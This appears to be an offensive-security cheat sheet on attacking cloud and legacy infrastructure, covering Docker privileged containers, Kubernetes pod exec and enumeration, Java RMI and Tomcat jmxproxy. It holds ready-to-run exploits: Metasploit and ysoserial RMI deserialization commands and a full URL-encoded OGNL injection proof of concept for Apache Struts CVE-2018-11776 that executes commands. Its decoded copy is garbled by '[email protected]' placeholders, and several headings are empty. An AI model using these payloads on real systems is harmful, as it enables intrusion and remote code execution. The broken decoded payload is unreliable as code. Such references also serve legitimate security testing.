Exploiting Cloud Infrastructure
Contents
Hadoop
In the server machine:
$
hadoop fs -ls /
$
hadoop fs -ls -R /
$
hadoop fs -get /<PATH>
$
hadoop fs -cat /<PATH>
$
hadoop fs -put /<PATH>
Docker
Useful commands:
- List containers
$
docker ps
- List images
$
docker images
By default, Docker containers are “unprivileged” and cannot, for example, run a Docker daemon inside a Docker container. This is because by default a container is not allowed to access any devices, but a “privileged” container is given access to all devices (see the documentation on cgroups devices).
When the operator executes
$
docker run --privileged
or
$
docker run --rm -it --cap-add=ALL $CMD
, Docker will enable access to all devices on the host as well as set some configuration in AppArmor or SELinux to allow the container nearly all the same access to the host as processes running outside containers on the host.
Kubernetes
Useful commands:
$
kubectl cluster-info
- Open a shell in the container:
$
kubectl exec <POD-NAME> -c <CONTAINER-NAME> -- bash
- List pods:
$
kubectl get pods
- List APIs:
$
kubectl get apiservices
- List hostnames:
$
kubectl get svc hostnames
- Check permissions:
$
kubectl auth can-i list secrets --namespace dev --as dave
Some paths:
$
curl -k https://$SERVER:8443/apis
Get all pods paths:
$
(curl http://$SERVER:$PORT/api/v1/pods | grep selfLink) 2> /dev/null | cut -d'"' -f4
If the kube-proxy was enabled
$
kubectl proxy &
, we can also query:
- How to execute commands inside the container:
$
curl http://127.0.0.1:8001/api/exec/$NAMESPACE/$POD/$CONTAINER?command=/bin/id&input=1&output=1&tty=0
Exploit for CVE-2018-1002105
In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.
minikube
Never use in production environments! It maps guest /Users to host /Users (In MacOS). Easy jail evasion.
How to open a ssh session in the guest:
$
minikube ssh
Google GWT-RPC
Get all RPC endpoints, leaked from X32.cache.js, being X32 a 32-char string retrieved from the page that does the call:
for i in `perl URLSUCKER -f X32.cache.js | strings -n 32`; do curl -Ik https://$SERVER:$PORT/$PATH/$i.gwt.rpc; done
More info: http://www.owasp.org/images/7/77/Attacking_Google_Web_Toolkit.ppt
Hashicorp Nomad
Hashicorp Consul
- List cluster members:
$
consul members -http-addr http://$HOST
- How to ACL between microservices:
$
consul intention create -deny web database
Jenkins RCE
Legacy systems
Java RMI
Nmap will recognize it as:
XXXX/tcp open rmiregistry Java RMI
Exploiting RMI
- With nmap:
root #
nmap --script=rmi-vuln-classloader -p 1099 $IP
root #
nmap --script=rmi-dumpregistry -p 1099 $IP
- With metasploit:
msf>
use exploit/multi/misc/java_rmi_server
- With ysoserial:
$
java -cp ysoserial.jar ysoserial.RMIRegistryExploit $IP 1098 CommonsCollections1 calc.exe
- With java monitoring and performance console (OS performance and application parameters):
$
jconsole
WinRM
Tomcat
jmxproxy
The JMX Proxy Servlet is a lightweight proxy to get and set the tomcat internals. (Or any class that has been exposed via an MBean) Its usage is not very user friendly but the UI is extremely helpful for integrating command line scripts for monitoring and changing the internals of tomcat. You can do two things with the proxy:
- get information
- set information
Source: https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#What_is_JMX_Proxy_Servlet
Paths:
http://$SERVER/manager/jmxproxy http://$SERVER/manager/jmxproxy/?qry=STUFF http://$SERVER/manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY http://$SERVER/manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage http://$SERVER/manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used http://$SERVER/manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE http://$SERVER/manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow http://$SERVER/manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS http://$SERVER/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
Apache Struts
CVE-2017-5638 Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution (RCE)
CVE-2017-9805 Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution (RCE)
Test lab deployment
$
docker pull piesecurity/apache-struts2-cve-2017-5638
$
docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
CVE-2018-11776
POC:
$
curl http://$IP/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
Decoded query:
http://$IP/\${(#_memberAccess['allowStaticMethodAccess']=true).(#cmd='id').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','c',#cmd}:{'bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}/help.action